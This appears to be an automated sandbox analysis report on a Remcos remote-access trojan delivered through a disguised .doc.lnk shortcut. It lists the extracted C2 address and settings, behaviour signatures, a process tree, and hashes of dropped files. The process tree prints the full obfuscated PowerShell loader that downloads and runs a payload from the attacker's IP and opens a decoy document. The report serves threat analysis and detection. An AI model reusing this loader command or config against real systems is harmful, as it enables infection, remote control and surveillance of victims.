remcos | 0973bf4ab963c2de6c69c3809ed228f0caf00409f4c09e78029640f2026dc19e

Analysis

max time kernel
148s
max time network
138s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
30/08/2024, 11:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

brt_1_0147.doc.lnk
Size

47KB
MD5

8b3dc64090b0b26eda4f1195f493160d
SHA1

bd0b4c1d9e8b84465714287727ba5293f9a8eb61
SHA256

cb43e05491b09d4c7da14d3f42d11a2bb4fa81b0fb47717d44c75426832cdf30
SHA512

ddbe1ad300d613531b6ffcb9a8ff607b1e6e7cf676ce738c31d138e6154ff0ee3c1b8d4d8b67c8fec5da444c845b62475736c228eb89d3b013a3ddcb15365deb
SSDEEP

48:88muavUQSbXTo87Cj3YMEDo/FoZaxCogDDo/LX7LdCZZGXu/dZZIa7x:88y8Nkgm3hX+UxCgLX7BuqQ

Score

10^/10

remcos feetfuck discovery rat

Malware Config

Extracted

Family

remcos

Botnet

feetfuck

83.222.191.201:24251

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-XTJ1YO
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Blocklisted process makes network request 1 IoCs

flow	pid	Process
7	4968	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	cmd.exe

Executes dropped EXE 2 IoCs

pid	Process
3460	Newfts.exe
1660	Newfts.exe

Loads dropped DLL 8 IoCs

pid	Process
3460	Newfts.exe
3460	Newfts.exe
3460	Newfts.exe
3460	Newfts.exe
1660	Newfts.exe
1660	Newfts.exe
1660	Newfts.exe
1660	Newfts.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1660 set thread context of 1324	1660	Newfts.exe	97

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Newfts.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Newfts.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
1540	WINWORD.EXE
1540	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
4968	powershell.exe
4968	powershell.exe
3460	Newfts.exe
1660	Newfts.exe
1660	Newfts.exe
1324	cmd.exe
1324	cmd.exe

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
1660	Newfts.exe
1324	cmd.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4968	powershell.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
1540	WINWORD.EXE
1540	WINWORD.EXE
1540	WINWORD.EXE
1540	WINWORD.EXE
1540	WINWORD.EXE
1540	WINWORD.EXE
1540	WINWORD.EXE

Suspicious use of WriteProcessMemory 19 IoCs

description	pid	Process	procid_target
PID 4856 wrote to memory of 4968	4856	cmd.exe	85
PID 4856 wrote to memory of 4968	4856	cmd.exe	85
PID 4968 wrote to memory of 3460	4968	powershell.exe	93
PID 4968 wrote to memory of 3460	4968	powershell.exe	93
PID 4968 wrote to memory of 3460	4968	powershell.exe	93
PID 4968 wrote to memory of 1540	4968	powershell.exe	94
PID 4968 wrote to memory of 1540	4968	powershell.exe	94
PID 3460 wrote to memory of 1660	3460	Newfts.exe	95
PID 3460 wrote to memory of 1660	3460	Newfts.exe	95
PID 3460 wrote to memory of 1660	3460	Newfts.exe	95
PID 1660 wrote to memory of 1324	1660	Newfts.exe	97
PID 1660 wrote to memory of 1324	1660	Newfts.exe	97
PID 1660 wrote to memory of 1324	1660	Newfts.exe	97
PID 1660 wrote to memory of 1324	1660	Newfts.exe	97
PID 1324 wrote to memory of 2808	1324	cmd.exe	109
PID 1324 wrote to memory of 2808	1324	cmd.exe	109
PID 1324 wrote to memory of 2808	1324	cmd.exe	109
PID 1324 wrote to memory of 2808	1324	cmd.exe	109
PID 1324 wrote to memory of 2808	1324	cmd.exe	109

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\brt_1_0147.doc.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4856
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win 1 echo QMwlXCkteAQTQqnkaJqrUqs; echo QvYiYqvrrHquSStJfMRfSfWhN; echo bbOXmbTScxuUqnRAgrxICMaBVDaWjzRzRVcfkbymVEadrSAtp; if (-not(Test-Path 'signalmessenger.zip' -PathType Leaf)){&(G''et-C''om''ma''nd in???e-webr**) -uri h''t''tp:''//''83''.''22''2''.''1''91''.''20''1/signalmessenger.zip -OutFile signalmessenger.zip}; echo smmOpvMyMQBsjhmNQati; Expand-Archive -Path signalmessenger.zip -DestinationPath SecurityCheck; s''tar''t SecurityCheck/Newfts.exe; echo XmLObXLAbAaEvFXwLygA; &(Ge''t-Com''ma''nd in???e-webre***) -uri h''t''tp:''//''83''.''22''2''.''1''91''.''20''1/racs/brt_1_0147.doc -OutFile brt_1_0147.doc; echo jKSqGTomhhZFxOMFkLZBsdHuhOCDBrMzMONLWouYJOCxTyelGMtYZGs; s''t''a''rt brt_1_0147.doc
  2⤵
  - Blocklisted process makes network request
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4968
- - C:\Users\Admin\AppData\Roaming\SecurityCheck\Newfts.exe
    "C:\Users\Admin\AppData\Roaming\SecurityCheck\Newfts.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:3460
  - - C:\Users\Admin\AppData\Roaming\localUltra_Zfv4\Newfts.exe
      C:\Users\Admin\AppData\Roaming\localUltra_Zfv4\Newfts.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      Suspicious use of WriteProcessMemory
      PID:1660
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        Suspicious use of WriteProcessMemory
        
        PID:1324
      - C:\Windows\SysWOW64\explorer.exe
        
        C:\Windows\SysWOW64\explorer.exe
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2808
- - C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Roaming\brt_1_0147.doc" /o ""
    3⤵
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious use of SetWindowsHookEx
    PID:1540

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\71160147

Filesize
1.2MB

MD5
829061c019d6e9cf6a879cc7dcdeaef5

SHA1
d9798c166877bec5a9700a69d7c5c4371bca440b

SHA256
783191c67c6987cfa1b845508e1afc87fcb569d6489d6705ff5bb3c9430357fd

SHA512
fca578a07c3854ba28405d246d849ae33cfb7975f7c77e70aefef99a2b122147af0fc02d1642f150c03aa758d425438ca1716585600a7b7eb6a75fc54806113d

Download Submit
C:\Users\Admin\AppData\Local\Temp\TCD14FF.tmp\iso690.xsl

Filesize
263KB

MD5
ff0e07eff1333cdf9fc2523d323dd654

SHA1
77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4

SHA256
3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5

SHA512
b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gzwc1mt5.sw2.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

Filesize
427B

MD5
7b85b7d4cb78a67aaaf8a28a5908d085

SHA1
4ca5d3c35f4dae122e46db7bced21d4c99bf50ab

SHA256
088c302e51aeb697a993a8fa4394d64e3c1b8ebd5fa542d2bdd336a361b12a3e

SHA512
0676bcae4dcc475e4fca40b3a401368fdae3bf956c61c42d78ac8310f8dcae2cb7fc418c73c4a8ecc78ad5ac045b6388db5df8efcc8afb41ad0d162a25366c18

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

Filesize
4KB

MD5
d57353f53747072a7c751aff552d307d

SHA1
a23aef557c2225a7b00399290dae382bd2550458

SHA256
ec722e7c6c29a04ddfd88787f89cc58eaeffe02c1eabd948a6cbe9ac758e6344

SHA512
9ecdb478eee8cf09d5ca0a8902b3e461e667436e1c895c33b1fa996c9c0218b28bc42b8519d01a3997aca90b8e2638734502e0d99fd38538808e91cf91824197

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

Filesize
5KB

MD5
8bc5362bf2ecd24a870597020e641a7d

SHA1
7ff04749d52751b9d79390decab25e72ba4694ee

SHA256
35b5c8f9f93860571ec88343674eab713fea15826774b112c12f1e731d04a732

SHA512
3b9e75e4f6a3f7706f0fb2a36f54c851a23e2eaca4b4b6367e5ef6b6388868f5c047290d0ea35e5a00ce56bcb74a07c4e2a743cf6dbecd6080b011807e9134ce

Download Submit
C:\Users\Admin\AppData\Roaming\SecurityCheck\Newfts.exe

Filesize
2.1MB

MD5
db7e67835fce6cf9889f0f68ca9c29a9

SHA1
5565afda37006a66f0e4546105be60bbe7970616

SHA256
dbd3057a58fd3407c95418bc5d9c253adc8c658ee338f22d58374ed3ea37b738

SHA512
bc2714bb408715e5e1cec1337b831e26dbda208183955a07ec8653a38c9c0f25f60f333a154b738927ce085e7bbff438963b941a6c2773b3e7325cd900e7651b

Download Submit
C:\Users\Admin\AppData\Roaming\SecurityCheck\ProductStatistics3.dll

Filesize
1.1MB

MD5
59c15c71fd599ff745a862d0b8932919

SHA1
8384f88b4cac4694cf510ca0d3f867fd83cc9e18

SHA256
c4ed07ad748661ce776ac6ebb4f8bef7619586bfb4443ce58c92d4b889f3d5c2

SHA512
be3425d55dcaa361bc8481b87b2086454baca79a3c948de9acf9ef7d3084d6d987c328d665b45dfcd0510e2c97c980aa63d7cd669fe9fc1a67983c325593481e

Download Submit
C:\Users\Admin\AppData\Roaming\SecurityCheck\RegisterIdr.dll

Filesize
1.4MB

MD5
6fdb2e9ca6b7a5ad510e2b29831e3bc8

SHA1
4a14ee9d5660eb271a6b5f18a55ac3e05f952c68

SHA256
f510c85b98fa6fe8d30133114a34b7f77884aa58e57a0561722eeb157dc98a38

SHA512
d5248dd902d862afa060ab829fc3a39dccc26dab37737e14a3f9b90b1d3f900b3bf5821f450502a2124016acf0e84bd8979758827a92741f879b2fa4addfda06

Download Submit
C:\Users\Admin\AppData\Roaming\SecurityCheck\kytarvx

Filesize
31KB

MD5
5dc69a3e2fda6cb740f363ef77edcc13

SHA1
c177fabf17346531e07d562be11915bf2822148a

SHA256
7c24abda04537749bfb1b2d2aa57a7c9261f41012435269347f7eb2d05f71621

SHA512
b32848b6eded965245b759be1b72b6fc81acb4002eceae96004e88e549e21eb6eb1ceb3e51f6249d7dfb739f31223e623f7c525f677939bc935d2f6bffb50a9f

Download Submit
C:\Users\Admin\AppData\Roaming\SecurityCheck\nywrof

Filesize
1.0MB

MD5
471076308d78944d45ab35d37134134a

SHA1
05cf2cf6e5d11ce10425b14d68cda3246cc47263

SHA256
38d10ba2f4411eba8351d5b3fed74ca46bf856569dca757d055eb49d8471e11b

SHA512
7f140546ceda85d3c178a61689a0743c75623b7d1e2dcc3e2d29128d7e13d9671cdb660ca46312dbd8ff3d63c12836caf1a6a54c074d66bed269184044bdd9c3

Download Submit
C:\Users\Admin\AppData\Roaming\brt_1_0147.doc

Filesize
47KB

MD5
2616f33bfc84fecd6496c0e3bfbfb1b0

SHA1
e4f4fba392ba4a245415729a82aaa486ca31b2ba

SHA256
24fbc1c09ca302ed51429082130f7789d36c254c0fb165dd96c3f24b458536a4

SHA512
b5c585d7bbdce5e5c34447a311ccdb5b90e34cfd29671f2ebb05f01941e81ae7bcffbd42f5ed476e784684de70cb0fb67cedfd7e62c4c3b5cbe151fc6923dafb

Download Submit
memory/1324-262-0x0000000073EE0000-0x000000007405B000-memory.dmp

Filesize
1.5MB

Download
memory/1324-143-0x00007FFAEAA70000-0x00007FFAEAC65000-memory.dmp

Filesize
2.0MB

Download
memory/1540-291-0x00007FFAAAAF0000-0x00007FFAAAB00000-memory.dmp

Filesize
64KB

Download
memory/1540-293-0x00007FFAAAAF0000-0x00007FFAAAB00000-memory.dmp

Filesize
64KB

Download
memory/1540-292-0x00007FFAAAAF0000-0x00007FFAAAB00000-memory.dmp

Filesize
64KB

Download
memory/1540-61-0x00007FFAAAAF0000-0x00007FFAAAB00000-memory.dmp

Filesize
64KB

Download
memory/1540-63-0x00007FFAAAAF0000-0x00007FFAAAB00000-memory.dmp

Filesize
64KB

Download
memory/1540-62-0x00007FFAAAAF0000-0x00007FFAAAB00000-memory.dmp

Filesize
64KB

Download
memory/1540-91-0x00007FFAA82E0000-0x00007FFAA82F0000-memory.dmp

Filesize
64KB

Download
memory/1540-64-0x00007FFAAAAF0000-0x00007FFAAAB00000-memory.dmp

Filesize
64KB

Download
memory/1540-66-0x00007FFAAAAF0000-0x00007FFAAAB00000-memory.dmp

Filesize
64KB

Download
memory/1540-294-0x00007FFAAAAF0000-0x00007FFAAAB00000-memory.dmp

Filesize
64KB

Download
memory/1540-90-0x00007FFAA82E0000-0x00007FFAA82F0000-memory.dmp

Filesize
64KB

Download
memory/1660-79-0x0000000002AB0000-0x0000000002BCE000-memory.dmp

Filesize
1.1MB

Download
memory/1660-117-0x0000000002AB0000-0x0000000002BCE000-memory.dmp

Filesize
1.1MB

Download
memory/1660-119-0x0000000073EE0000-0x000000007405B000-memory.dmp

Filesize
1.5MB

Download
memory/1660-92-0x00007FFAEAA70000-0x00007FFAEAC65000-memory.dmp

Filesize
2.0MB

Download
memory/1660-116-0x0000000000400000-0x0000000000669000-memory.dmp

Filesize
2.4MB

Download
memory/1660-89-0x0000000073EE0000-0x000000007405B000-memory.dmp

Filesize
1.5MB

Download
memory/1660-118-0x0000000002EE0000-0x0000000003052000-memory.dmp

Filesize
1.4MB

Download
memory/1660-86-0x0000000002EE0000-0x0000000003052000-memory.dmp

Filesize
1.4MB

Download
memory/2808-271-0x0000000000400000-0x0000000000483000-memory.dmp

Filesize
524KB

Download
memory/2808-268-0x0000000000400000-0x0000000000483000-memory.dmp

Filesize
524KB

Download
memory/2808-264-0x00007FFAEAA70000-0x00007FFAEAC65000-memory.dmp

Filesize
2.0MB

Download
memory/2808-265-0x0000000000400000-0x0000000000483000-memory.dmp

Filesize
524KB

Download
memory/2808-267-0x0000000000400000-0x0000000000483000-memory.dmp

Filesize
524KB

Download
memory/2808-272-0x0000000000400000-0x0000000000483000-memory.dmp

Filesize
524KB

Download
memory/2808-273-0x0000000000400000-0x0000000000483000-memory.dmp

Filesize
524KB

Download
memory/2808-295-0x0000000000400000-0x0000000000483000-memory.dmp

Filesize
524KB

Download
memory/2808-296-0x0000000000400000-0x0000000000483000-memory.dmp

Filesize
524KB

Download
memory/2808-297-0x0000000000400000-0x0000000000483000-memory.dmp

Filesize
524KB

Download
memory/3460-47-0x0000000002FF0000-0x0000000003162000-memory.dmp

Filesize
1.4MB

Download
memory/3460-43-0x0000000002C90000-0x0000000002DAE000-memory.dmp

Filesize
1.1MB

Download
memory/3460-80-0x0000000000400000-0x0000000000669000-memory.dmp

Filesize
2.4MB

Download
memory/3460-83-0x0000000002FF0000-0x0000000003162000-memory.dmp

Filesize
1.4MB

Download
memory/3460-82-0x0000000002C90000-0x0000000002DAE000-memory.dmp

Filesize
1.1MB

Download
memory/3460-65-0x00007FFAEAA70000-0x00007FFAEAC65000-memory.dmp

Filesize
2.0MB

Download
memory/3460-50-0x0000000073EE0000-0x000000007405B000-memory.dmp

Filesize
1.5MB

Download
memory/4968-2-0x00007FFACC923000-0x00007FFACC925000-memory.dmp

Filesize
8KB

Download
memory/4968-75-0x00007FFACC920000-0x00007FFACD3E1000-memory.dmp

Filesize
10.8MB

Download
memory/4968-18-0x000001E871810000-0x000001E87181A000-memory.dmp

Filesize
40KB

Download
memory/4968-17-0x000001E871820000-0x000001E871832000-memory.dmp

Filesize
72KB

Download
memory/4968-16-0x00007FFACC920000-0x00007FFACD3E1000-memory.dmp

Filesize
10.8MB

Download
memory/4968-14-0x00007FFACC920000-0x00007FFACD3E1000-memory.dmp

Filesize
10.8MB

Download
memory/4968-13-0x00007FFACC920000-0x00007FFACD3E1000-memory.dmp

Filesize
10.8MB

Download
memory/4968-3-0x000001E871790000-0x000001E8717B2000-memory.dmp

Filesize
136KB

Download